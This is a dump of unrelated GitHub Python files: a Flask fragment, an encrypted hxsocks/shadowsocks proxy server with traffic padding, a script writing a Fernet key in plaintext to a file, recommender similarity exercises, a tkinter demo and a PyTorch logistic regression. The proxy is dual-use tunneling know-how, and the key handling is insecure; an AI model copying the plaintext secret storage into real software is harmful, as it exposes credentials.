app.config.from_pyfile(config_file)
else:
app.config.from_envvar(config_variable_name)
if settings_override:
app.config.update(settings_override)
@app.cli.command("load_docs")
def load_docs():
data_load_command()
init_app(app)
api.init_app(app)
return app
def init_app(app):
db.init_app(app)
migrate.init_app(app, db)
#api.init_app(app)
| shano/document_keyword_analysis | app.py | app.py | py | 849 | python | en | code | 0 | github-code | 36 |
32365176970 | from __future__ import with_statement
import os
import sys
try:
import gevent
import gevent.monkey
gevent.monkey.patch_all(dns=gevent.version_info[0] >= 1)
except ImportError:
gevent = None
print >>sys.stderr, 'warning: gevent not found, using threading instead'
import errno
import socket
import threading
import time
import random
import select
import SocketServer
import struct
import hashlib
import hmac
import logging
import io
import json
import urlparse
import traceback
from collections import defaultdict, deque
from util import create_connection, get_ip_address, parse_hostport
import encrypt
from encrypt import compare_digest
from ecc import ECC
__version__ = '0.0.1'
DEFAULT_METHOD = 'aes-128-cfb'
DEFAULT_HASH = 'sha256'
MAC_LEN = 16
CTX = b'hxsocks'
USER_PASS = {'user': 'pass'}
SERVER_CERT = None
class KeyManager:
userpkeys = defaultdict(deque)
pkeyuser = {}
pkeykey = {}
pkeytime = {}
@classmethod
def create_key(cls, user, client_pkey, klen):
if cls.notvalid(user, client_pkey):
return 0, 0
if len(cls.userpkeys[user]) > 3:
cls.del_key(cls.userpkeys[user][0])
dh = ECC(klen)
shared_secret = dh.get_dh_key(client_pkey)
client_pkey = hashlib.md5(client_pkey).digest()
cls.userpkeys[user].append(client_pkey)
cls.pkeyuser[client_pkey] = user
cls.pkeykey[client_pkey] = shared_secret
cls.pkeytime[client_pkey] = time.time()
return dh.get_pub_key(), USER_PASS[user]
@classmethod
def notvalid(cls, user, client_pkey):
return hashlib.md5(client_pkey).digest() in cls.pkeyuser
@classmethod
def check_key(cls, pubk):
if pubk not in cls.pkeykey:
return 1
if cls.pkeytime[pubk] < time.time() - 6 * 3600:
cls.del_key(pubk)
return 1
@classmethod
def del_key(cls, pkey):
user = cls.pkeyuser[pkey]
del cls.pkeyuser[pkey]
del cls.pkeytime[pkey]
del cls.pkeykey[pkey]
cls.userpkeys[user].remove(pkey)
@classmethod
def get_user_by_pubkey(cls, pubkey):
return cls.pkeyuser[pubkey]
@classmethod
def get_skey_by_pubkey(cls, pubkey):
return cls.pkeykey[pubkey]
class HXSocksServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
allow_reuse_address = True
def __init__(self, serverinfo, forward, RequestHandlerClass, bind_and_activate=True):
self.serverinfo = serverinfo
self.forward = set(forward)
p = urlparse.urlparse(serverinfo)
if p.scheme == 'ss':
self.PSK, self.method = p.password, p.username
elif p.scheme == 'hxs':
self.PSK = urlparse.parse_qs(p.query).get('PSK', [''])[0]
self.method = urlparse.parse_qs(p.query).get('method', [DEFAULT_METHOD])[0]
else:
raise ValueError('bad serverinfo: {}'.format(self.serverinfo))
q = urlparse.parse_qs(p.query)
proxy = q.get('proxy', [''])[0]
self.proxy = parse_hostport(proxy) if proxy else None
self.server = q.get('UA', ['nginx/1.2.2'])[0]
self.hash_algo = q.get('hash', [DEFAULT_HASH])[0].upper()
self.ss = self.PSK and q.get('ss', ['1'])[0] == '1'
addrs = socket.getaddrinfo(p.hostname, p.port)
if not addrs:
raise ValueError('cant resolve listen address')
self.address_family = addrs[0][0]
server_address = (p.hostname, p.port)
SocketServer.TCPServer.__init__(self, server_address, RequestHandlerClass, bind_and_activate=bind_and_activate)
class HXSocksHandler(SocketServer.StreamRequestHandler):
timeout = 10
bufsize = 1024 * 16
def handle(self):
try:
self.connection.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
pskcipher = encrypt.Encryptor(self.server.PSK, self.server.method)
self.connection.settimeout(self.timeout)
data = self.rfile.read(pskcipher.iv_len)
pskcipher.decrypt(data)
while True:
try:
data = self.rfile.read(1)
self.connection.settimeout(self.timeout)
cmd = ord(pskcipher.decrypt(data))
except Exception as e:
logging.error('cmd Exception: server %s %r from %s:%s' % (self.server.server_address[1], e, self.client_address[0], self.client_address[1]))
break
if cmd == 10: # client key exchange
rint = random.randint(64, 255)
req_len = pskcipher.decrypt(self.rfile.read(2))
req_len = struct.unpack('>H', req_len)[0]
data = pskcipher.decrypt(self.rfile.read(req_len))
data = io.BytesIO(data)
ts = data.read(4)
if abs(struct.unpack('>I', ts)[0] - time.time()) > 120:
# possible replay attack
logging.error('bad timestamp. client_ip: %s' % self.client_address[0])
break
pklen = ord(data.read(1))
client_pkey = data.read(pklen)
client_auth = data.read(32)
def _send(data):
data = struct.pack('>H', len(data)) + data
self.wfile.write(pskcipher.encrypt(data))
client = None
for user, passwd in USER_PASS.items():
h = hmac.new(passwd.encode(), ts + client_pkey + user.encode(), hashlib.sha256).digest()
if compare_digest(h, client_auth):
client = user
break
else:
logging.error('user not found. client_ip: %s' % self.client_address[0])
break
pkey, passwd = KeyManager.create_key(client, client_pkey, pskcipher.key_len)
if pkey:
logging.info('new key exchange. client: %s, ip: %s' % (client, self.client_address[0]))
h = hmac.new(passwd.encode(), client_pkey + pkey + client.encode(), hashlib.sha256).digest()
scert = SERVER_CERT.get_pub_key()
signature = SERVER_CERT.sign(h, self.server.hash_algo)
data = chr(0) + chr(len(pkey)) + chr(len(scert)) + chr(len(signature)) + pkey + h + scert + signature + os.urandom(rint)
_send(data)
continue
else:
logging.error('Private_key already registered. client: %s, ip: %s' % (client, self.client_address[0]))
# KeyManager.del_key(hashlib.md5(client_pkey).digest())
break
elif cmd == 11: # a connect request
client_pkey = pskcipher.decrypt(self.rfile.read(16))
rint = random.randint(64, 2048)
def _send(code, cipher):
if code == 1:
data = os.urandom(rint)
data = pskcipher.encrypt(struct.pack('>H', rint)) + data
self.wfile.write(data)
else:
ct = cipher.encrypt(chr(code) + os.urandom(rint-1))
data = pskcipher.encrypt(struct.pack('>H', len(ct))) + ct
self.wfile.write(data)
if KeyManager.check_key(client_pkey):
logging.error('client key not exist or expired. client ip: %s' % self.client_address[0])
ctlen = struct.unpack('>H', pskcipher.decrypt(self.rfile.read(2)))[0]
self.rfile.read(ctlen)
_send(1, None)
continue
user = KeyManager.get_user_by_pubkey(client_pkey)
cipher = encrypt.AEncryptor(KeyManager.get_skey_by_pubkey(client_pkey), self.server.method, CTX)
ctlen = struct.unpack('>H', pskcipher.decrypt(self.rfile.read(2)))[0]
ct = self.rfile.read(ctlen)
data = cipher.decrypt(ct)
buf = io.BytesIO(data)
ts = buf.read(4)
if abs(struct.unpack('>I', ts)[0] - time.time()) > 120:
logging.error('bad timestamp, possible replay attrack. client ip: %s' % self.client_address[0])
# KeyManager.del_key(client_pkey)
# _send(1, None)
break
host_len = ord(buf.read(1))
addr = buf.read(host_len)
port = struct.unpack('>H', buf.read(2))[0]
if self._request_is_loopback((addr, port)) and port not in self.server.forward:
logging.info('server %d access localhost:%d denied. from %s:%d, %s' % (self.server.server_address[1], port, self.client_address[0], self.client_address[1], user))
_send(2, cipher)
continue
try:
logging.info('server %d request %s:%d from %s:%d, %s' % (self.server.server_address[1],
addr, port, self.client_address[0], self.client_address[1], user))
remote = create_connection((addr, port), timeout=10, proxy=self.server.proxy)
remote.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
_send(0, cipher)
# self.remote.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
except (IOError, OSError) as e: # Connection refused
logging.warning('server %s:%d %r on connecting %s:%d' % (self.server.server_address[0], self.server.server_address[1], e, addr, port))
_send(2, cipher)
continue
if self.forward_tcp(self.connection, remote, cipher, pskcipher, timeout=60):
break
self.connection.settimeout(60)
logging.debug('hxsocks connect reusable, except next connection')
elif cmd in (1, 3, 4, 17, 19, 20):
# A shadowsocks request
if not self.server.ss:
logging.warning('shadowsocks not enabled for this server. port: %d' % self.server.server_address[1])
break
ota = cmd & 16
if cmd & 15 == 1:
_addr = pskcipher.decrypt(self.rfile.read(4))
addr = socket.inet_ntoa(_addr)
elif cmd & 15 == 3:
_addr = pskcipher.decrypt(self.rfile.read(1))
addr = pskcipher.decrypt(self.rfile.read(ord(_addr)))
_addr += addr
elif cmd & 15 == 4:
_addr = socket.AF_INET6, pskcipher.decrypt(self.rfile.read(16))
addr = socket.inet_ntop(_addr)
port = struct.unpack('>H', pskcipher.decrypt(self.rfile.read(2)))[0]
# verify
if ota:
header = chr(cmd) + _addr + struct.pack('>H', port)
self._ota_chunk_idx = 0
rmac = pskcipher.decrypt(self.rfile.read(10))
key = pskcipher.decipher_iv + pskcipher.key
mac = hmac.new(key, header, hashlib.sha1).digest()[:10]
if not compare_digest(rmac, mac):
logging.error("OTA Failed!!")
break
if self._request_is_loopback((addr, port)) and port not in self.server.forward:
logging.info('server %d access localhost:%d denied. from %s:%d' % (self.server.server_address[1], port, self.client_address[0], self.client_address[1]))
break
try:
remote = None
logging.info('server %d SS request %s:%d from %s:%d %s' % (self.server.server_address[1],
addr, port, self.client_address[0], self.client_address[1], 'with ota' if ota else ''))
remote = create_connection((addr, port), timeout=10, proxy=self.server.proxy)
if ota:
return self.ssforward_tcp_ota(self.connection, remote, pskcipher, timeout=60)
return self.ssforward_tcp(self.connection, remote, pskcipher, timeout=60)
except (IOError, OSError) as e: # Connection refused
logging.warn('server %s:%d %r on connecting %s:%d' % (self.server.server_address[0], self.server.server_address[1], e, addr, port))
return
else:
logging.warning('unknown cmd %d, bad encryption key?' % cmd)
break
ins, _, _ = select.select([self.connection], [], [], 1)
while ins:
data = self.connection.recv(self.bufsize)
if not data:
break
ins, _, _ = select.select([self.connection], [], [], 1)
except Exception as e:
logging.error(repr(e))
logging.error(traceback.format_exc())
def forward_tcp(self, local, remote, cipher, pskcipher, timeout=60):
readable = 1
writeable = 1
closed = 0
close_count = 0
fds = [local, remote]
total_send = 0
try:
while fds:
if len(fds) < 2:
timeout = 3
ins, _, _ = select.select(fds, [], [], timeout)
if not ins:
logging.debug('timed out')
close_count += 1
if remote in fds:
fds.remove(remote)
remote.shutdown(socket.SHUT_RD)
if writeable:
padding_len = random.randint(8, 255)
data = chr(padding_len) + b'\x00' * padding_len
ct = cipher.encrypt(data)
data = pskcipher.encrypt(struct.pack('>H', len(ct))) + ct
local.sendall(data)
writeable = 0
if close_count > 2:
break
if local in ins:
ct_len = self.rfile.read(2)
if not ct_len:
logging.debug('client closed')
fds.remove(local)
remote.shutdown(socket.SHUT_WR)
closed = 1
else:
ct_len = struct.unpack('>H', pskcipher.decrypt(ct_len))[0]
ct = self.rfile.read(ct_len)
data = cipher.decrypt(ct)
pad_len = ord(data[0])
cmd = ord(data[-1])
if 0 < pad_len < 8:
# fake chunk, drop
if pad_len == 1 and writeable:
_data = chr(2) + b'\x00' * random.randint(1024, 8196)
ct = cipher.encrypt(_data)
_data = pskcipher.encrypt(struct.pack('>H', len(ct))) + ct
local.sendall(_data)
else:
data = data[1:0-pad_len] if pad_len else data[1:]
if data:
remote.sendall(data)
else:
logging.debug('client close, gracefully')
if cmd:
remote.close()
else:
remote.shutdown(socket.SHUT_WR)
fds.remove(local)
readable = 0
if remote in ins:
data = remote.recv(self.bufsize)
if not data:
writeable = 0
fds.remove(remote)
if total_send < 8196 and random.random() < 0.5:
_data = chr(2) + b'\x00' * random.randint(1024, 8196)
ct = cipher.encrypt(_data)
_data = pskcipher.encrypt(struct.pack('>H', len(ct))) + ct
local.sendall(_data)
# if writeable and readable and not closed and random.random() < 0.1:
# # request fake chunk
# _data = chr(1) + b'\x00' * random.randint(1024, 8196)
# ct = cipher.encrypt(_data)
# _data = pskcipher.encrypt(struct.pack('>H', len(ct))) + ct
# local.sendall(_data)
total_send += len(data)
padding_len = random.randint(8, 255)
data = chr(padding_len) + data + b'\x00' * padding_len
ct = cipher.encrypt(data)
data = pskcipher.encrypt(struct.pack('>H', len(ct))) + ct
local.sendall(data)
if closed:
break
except socket.timeout:
pass
except (OSError, IOError) as e:
if e.args[0] in (errno.EBADF,):
return
if e.args[0] not in (errno.ECONNABORTED, errno.ECONNRESET, errno.ENOTCONN, errno.EPIPE):
raise
except Exception as e:
logging.error(repr(e))
logging.error(traceback.format_exc())
finally:
try:
remote.close()
except (OSError, IOError):
pass
self.connection.settimeout(600)
return readable + writeable
def ssforward_tcp(self, local, remote, cipher, timeout=60):
try:
while 1:
ins, _, _ = select.select([local, remote], [], [], timeout)
if not ins:
break
if local in ins:
data = local.recv(self.bufsize)
if not data:
break
remote.sendall(cipher.decrypt(data))
if remote in ins:
data = remote.recv(self.bufsize)
if not data:
break
local.sendall(cipher.encrypt(data))
except socket.timeout:
pass
except (OSError, IOError) as e:
if e.args[0] in (errno.EBADF,):
return
if e.args[0] not in (errno.ECONNABORTED, errno.ECONNRESET, errno.ENOTCONN, errno.EPIPE):
raise
except Exception as e:
logging.error(repr(e))
logging.error(traceback.format_exc())
finally:
for sock in (remote, local):
try:
sock.close()
except (OSError, IOError):
pass
def ssforward_tcp_ota(self, local, remote, cipher, timeout=60):
try:
while 1:
ins, _, _ = select.select([local, remote], [], [], timeout)
if not ins:
break
if local in ins:
data_len = struct.unpack('>H', cipher.decrypt(self.rfile.read(2)))[0]
rmac = cipher.decrypt(self.rfile.read(10))
data = cipher.decrypt(self.rfile.read(data_len))
index = struct.pack('>I', self._ota_chunk_idx)
key = cipher.decipher_iv + index
mac = hmac.new(key, data, hashlib.sha1).digest()[:10]
if encrypt.compare_digest(rmac, mac):
self._ota_chunk_idx += 1
remote.sendall(data)
else:
logging.warning('OTA Failed')
if remote in ins:
data = remote.recv(self.bufsize)
if not data:
break
local.sendall(cipher.encrypt(data))
except socket.timeout:
pass
except (OSError, IOError) as e:
if e.args[0] in (errno.EBADF,):
return
if e.args[0] not in (errno.ECONNABORTED, errno.ECONNRESET, errno.ENOTCONN, errno.EPIPE):
raise
except Exception as e:
logging.error(repr(e))
logging.error(traceback.format_exc())
finally:
for sock in (remote, local):
try:
sock.close()
except (OSError, IOError):
pass
def _request_is_loopback(self, req):
try:
return get_ip_address(req[0]).is_loopback
except Exception:
pass
def start_servers(config, forward):
for serverinfo in config:
try:
logging.info('starting server: %s' % serverinfo)
ssserver = HXSocksServer(serverinfo, forward, HXSocksHandler)
threading.Thread(target=ssserver.serve_forever).start()
except Exception as e:
logging.error('something wrong with config: %r' % e)
def main():
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(levelname)-8s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S', filemode='a+')
hello = 'hxsocks-server %s' % __version__
if gevent:
hello += ' with gevent %s' % gevent.__version__
print(hello)
print('by v3aqb')
global SERVER_CERT
try:
SERVER_CERT = ECC(from_file=os.path.join(os.path.dirname(os.path.abspath(__file__)), 'cert.pem'))
except:
logging.warning('server cert not found, creating...')
SERVER_CERT = ECC(key_len=32)
SERVER_CERT.save(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'cert.pem'))
servers = ['hxs://0.0.0.0:9000']
forward = []
if os.path.exists(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'config.json')):
global USER_PASS
d = json.loads(open(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'config.json')).read())
USER_PASS = d['users']
servers = d['servers']
forward = d.get('forward', [])
for s in servers:
logging.info('starting server: %s' % s)
ssserver = HXSocksServer(s, forward, HXSocksHandler)
threading.Thread(target=ssserver.serve_forever).start()
if __name__ == '__main__':
try:
main()
except socket.error as e:
logging.error(e)
except KeyboardInterrupt:
sys.exit(0)
| hadidonk/hxsocks | hxsserver.py | hxsserver.py | py | 23,258 | python | en | code | 0 | github-code | 36 |
41133433788 | from cryptography.fernet import Fernet
import os
from pathlib import Path
default_path = Path("/home/Diode/Dicot/VisionIOT/main")
if not os.path.exists(default_path):
os.makedirs(default_path)
filen = os.path.join(default_path, "app.dat")
open(filen, 'w').close()
forread = open(filen)
content = forread.read()
forread.close()
appsetting = open(filen, 'w')
k_ey = Fernet.generate_key()
appsetting.write(content + "\nsecretKey: " + str(k_ey))
appsetting.close() | imdiode/PythonExper | home4.py | home4.py | py | 502 | python | en | code | 0 | github-code | 36 |
74552041385 |
def hr():
print('─' * 20)
def l():
print('\n')
def _():
l()
hr()
l()
def jaccard(v1,v2):
# πρώτη συνάρτηση ομοιότητας, jaccard
union = len(v1)
count = 0
for i in range(len(v1)):
if(v1[i]):
if(v2[i]):
count = count + 1
jaccard = count/union
jaccard = round(jaccard,2)
return jaccard
def subtractTheRowMean(vector):
# function which subtracts the (row) mean of a vector
countVector = 0
for i in range(len(vector)):
if (vector[i]!=0):
countVector+=1
mean = sum(vector)/countVector
# print(mean)
for i in range(len(vector)):
if (vector[i]!=0):
vector[i] = vector[i]-mean
return vector
def adjustedCosine(v1, v2):
# πρώτη συνάρτηση ομοιότητας, adjusted cosine
import math
v1=subtractTheRowMean(v1)
v2=subtractTheRowMean(v2)
"compute cosine similarity of v1 to v2: (v1 dot v2)/{||v1||*||v2||)"
sumxx, sumxy, sumyy = 0, 0, 0
for i in range(len(v1)):
x = v1[i]
y = v2[i]
sumxy += x*y
sumxx += x*x
sumyy += y*y
adjustedCosine = sumxy/math.sqrt(sumxx*sumyy)
adjustedCosine = round(adjustedCosine,3)
return adjustedCosine
def predictiveFunction(k, sim, r):
# συνάρτηση πρόβλεψης
# αποτελεί τον σταθμισμένο μέσο όρο των Κ κοντινότερων γειτόνων
similarities = 0
sumSimR = 0
for d in range(0,k):
similarities = similarities + sim[d]
sumSimR = sumSimR + (sim[d]*r[d])
predictedRank = sumSimR/similarities
predictedRank = round(predictedRank,1)
predictedRank = round(predictedRank,0)
return predictedRank
"""
# jaccard similarity test
l()
print('random example:')
rankingX = [1,1,1,0,1]
rankingY = [1,0,1,1,1]
print('jaccard:', jaccard(rankingX, rankingY))
print('3/5:', 3/5)
l()
"""
# item-item collaborative filtering system
item1 = [3, 4, 3, 1]
item2 = [1, 3, 3, 5]
item3 = [2, 4, 1, 5]
item4 = [3, 3, 5, 2]
item5 = [3, 5, 4, 1]
l()
print('Πρόβλεψη με item-item collaborative filtering system')
print('adjusted cosine v1, v5:', adjustedCosine(item1,item5))
print('adjusted cosine v2, v5:', adjustedCosine(item2,item5))
print('adjusted cosine v3, v5:', adjustedCosine(item3,item5))
print('adjusted cosine v4, v5:', adjustedCosine(item4,item5))
k=2
sim = [adjustedCosine(item1,item5),adjustedCosine(item4,item5)]
r = [5,4]
print('Πρόβλεψη',predictiveFunction(k, sim, r))
l()
# user-user collaborative filtering system
user1 = [3, 1, 2, 3]
user2 = [4, 3, 4, 3]
user3 = [3, 3, 1, 5]
user4 = [1, 5, 5, 2]
alice = [5, 3, 4, 4]
l()
print('Πρόβλεψη με user-user collaborative filtering system')
print('adjusted cosine v1, alice:', adjustedCosine(user1,alice))
print('adjusted cosine v2, alice:', adjustedCosine(user2,alice))
print('adjusted cosine v3, alice:', adjustedCosine(user3,alice))
print('adjusted cosine v4, alice:', adjustedCosine(user4,alice))
k=2
sim = [adjustedCosine(user1,alice),adjustedCosine(user2,alice)]
r = [3,5]
print('Πρόβλεψη',predictiveFunction(k, sim, r))
l()
| Apostolos172/uom | s7/Information Retrieval and Search Engines/recommender/irTheoryExample.py | irTheoryExample.py | py | 3,271 | python | en | code | 0 | github-code | 36 |
11262269606 | from tkinter import *
root = Tk()
# 创建一个Canvas,设置其背景色为白色
cv = Canvas(root, bg='white')
d = {1: PIESLICE, 2: CHORD, 3: ARC}
for i in d:
cv.create_arc(
(10, 10 + 60 * i, 110, 110 + 60 * i),
style=d[i], # 指定样式
start=30, # 指定起始角度
extent=30 # 指定角度偏移量
)
cv.pack()
root.mainloop()
# 使用三种样式,分别创建了扇形、弓形和弧形
| weiyinfu/learnTkinter | 画布/create_arc.py | create_arc.py | py | 443 | python | zh | code | 1 | github-code | 36 |
36532411991 | #The code base on https://github.com/zergtant/pytorch-handbook
import torch # pytorch 实现
import torch.nn as nn
import numpy as np #处理矩阵运算
'''
1 logistic回归会在线性回归后再加一层logistic函数的调用,主要
用于二分类预测
2 使用UCI German Credit 数据集
german.data-numeric 是已经使用numpy 处理好的数值化数据,
可以直接numpy 调用
'''
# 第一步:读取数据
data=np.loadtxt("german.data-numeric") #将数据放到文件中加载
#第二步:对数据做归一化处理
n,l=data.shape #shape 返回矩阵大小
for i in range(l-1): #按列索引
meanVal=np.mean(data[:,i]) #求均值 [:,i] 取所有行第i列所有值
stdVal=np.std(data[:i]) # 标准差
data[:,i]=(data[:,i]-meanVal)/stdVal
#打乱数据
np.random.shuffle(data)
'''
第三步:区分数据集和测试集:
区分规则:900条用于训练,100条用于测试
前24列为24个维度,最后一个要打的标签(0,1)
'''
train_data=data[:900,:l-1]
train_lab=data[:900,l-1]-1
test_data=data[900:,:l-1]
test_lab=data[900:,l-1]-1
#第四步 定义模型
class Logistic_Regression(nn.Module):
#初始化模型
def __init__(self):
# super(Logistic_Regression,self) 首先找到 Logistic_Regression的父类(就是类nn.Module)
# 然后把类 Logistic_Regression的对象转换为类 nn.Module的对象
super(Logistic_Regression,self).__init__()
self.fc=nn.Linear(24,2) # 输入通道为24,输出通道为2
#前向传播
def forward(self,x):
out=self.fc(x)
out=torch.sigmoid(out) # sigmoid 激活
return out
#测试集上的准确率
def test(pred,lab):
t=pred.max(-1)[1]==lab
return torch.mean(t.float())
#第五步:设置超参数和优化
net=Logistic_Regression()
criterion=nn.CrossEntropyLoss() #定义损失函数
optm=torch.optim.Adam(net.parameters()) #利用Adam 进行优化
epochs=1100#训练次数
#第六步:开始训练
for i in range(epochs):
#指定模型为训练模式,计算梯度
net.train()
#将numpy 输入转换为torch的Tensor
x=torch.from_numpy(train_data).float()
y=torch.from_numpy(train_lab).long()
y_hat=net(x) #x 为训练数据
loss=criterion(y_hat,y) #计算损失
optm.zero_grad() #前一步损失清零
loss.backward() #f=反向传播
optm.step() #优化
if (i+1)%100==0: #每一百100输出相关信息
net.eval()
test_in=torch.from_numpy(test_data).float()
test_l=torch.from_numpy(test_lab).long()
test_out=net(test_in)
accu=test(test_out,test_l)
print("Epoch:{},Loss:{:.4f},Accuracy:{:.2f}".format(i+1,loss.item(),accu))
| BrandonHoo/Deep-Learning-Practice-Project | Logistic_Regression_practice.py | Logistic_Regression_practice.py | py | 2,774 | python | zh | code | 1 | github-code | 36 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.